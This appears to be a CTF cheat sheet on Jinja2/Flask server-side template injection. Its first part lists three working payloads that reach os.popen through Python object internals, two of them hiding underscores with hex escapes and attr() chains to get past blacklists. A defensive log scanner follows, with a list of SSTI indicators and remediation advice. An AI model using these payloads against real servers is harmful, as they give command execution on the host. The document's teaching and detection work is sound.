Server Side Template Injection

Python Jinja2 (with Flask)

  • Good Resource
  • Exploit by calling subprocess.Popen (Python / Jinja2 payloads)

    # Simple version
    {{config.__class__.__init__.__globals__['os'].popen('cat flag').read()}}

    # Circumvent blacklisted special characters leveraging Jinja's attr(), pipe filtering, and hex encoding of underscores
    {{config|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5finit\x5f\x5f')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('os')|attr('popen')('cat flag')|attr('read')()}}

    # Another example
    {{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('cat flag')|attr('read')()}}
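From the detection side, the obfuscated payloads above are a reminder that a blacklist on `__` or `.` is easy to bypass, so a detector has to normalise first (percent-decoding, then `\xNN` escapes) and only then look for the `{{ ... }}` delimiters, dunder names and `attr()` chains. The following is an added example, not part of the original page: a stdlib-only scanner over constructed access-log lines; the log format, the IP addresses and the indicator list are assumptions.

```python
"""Flag Jinja2 SSTI probes in request parameters, including attr() chains with hex-encoded underscores."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Gadget-chain building blocks used by the payloads on this page (assumed indicator list).
DUNDER_RE = re.compile(r"__(class|init|globals|builtins|import|getitem|subclasses|mro)__")
TEMPLATE_RE = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)
SUSPICIOUS = ("attr(", "popen", "subprocess", "config", "request")
# Apache/nginx combined-format request line (assumed format).
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<path>\S+) HTTP')

def normalise(value: str) -> str:
    """Undo the encodings used to slip past naive blacklists: repeated
    percent-encoding, then Python/Jinja-style \\xNN escapes (\\x5f -> '_')."""
    prev = None
    while prev != value:  # loop so double-encoded input is fully decoded
        prev = value
        value = unquote(value)
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), value)

def ssti_indicators(value: str) -> list[str]:
    """Return the SSTI indicators found in one parameter value (empty list if clean)."""
    text = normalise(value)
    found = []
    if TEMPLATE_RE.search(text):
        found.append("template-delimiters")
    found += sorted({"dunder:" + m.group(0) for m in DUNDER_RE.finditer(text)})
    found += ["token:" + t for t in SUSPICIOUS if t in text]
    return found

def scan_access_log(lines) -> list[tuple[str, str, list[str]]]:
    """Return (client_ip, parameter, indicators) for every query parameter that looks like a probe."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("path")).query
        for key, values in parse_qs(query, keep_blank_values=True).items():
            for v in values:
                indicators = ssti_indicators(v)
                if indicators:
                    hits.append((m.group("ip"), key, indicators))
    return hits

ACCESS_LOG = [  # constructed sample lines; the first carries the attr()/\x5f chain, the third a {{7*7}} probe
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /hello?name=%7B%7Bconfig%7Cattr%28%27%5Cx5f%5Cx5fclass%5Cx5f%5Cx5f%27%29%7Cattr%28%27%5Cx5f%5Cx5finit%5Cx5f%5Cx5f%27%29%7Cattr%28%27%5Cx5f%5Cx5fglobals%5Cx5f%5Cx5f%27%29%7D%7D HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /hello?name=alice HTTP/1.1" 200 128',
    '203.0.113.5 - - [10/Oct/2023:13:57:12 +0000] "GET /hello?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 130',
]

if __name__ == "__main__":
    for ip, param, indicators in scan_access_log(ACCESS_LOG):
        print(f"{ip} param={param} indicators={indicators}")
```

The real fix is never to build a template from user input (use a context variable with render_template instead); this scanner is for spotting probes in traffic you already log.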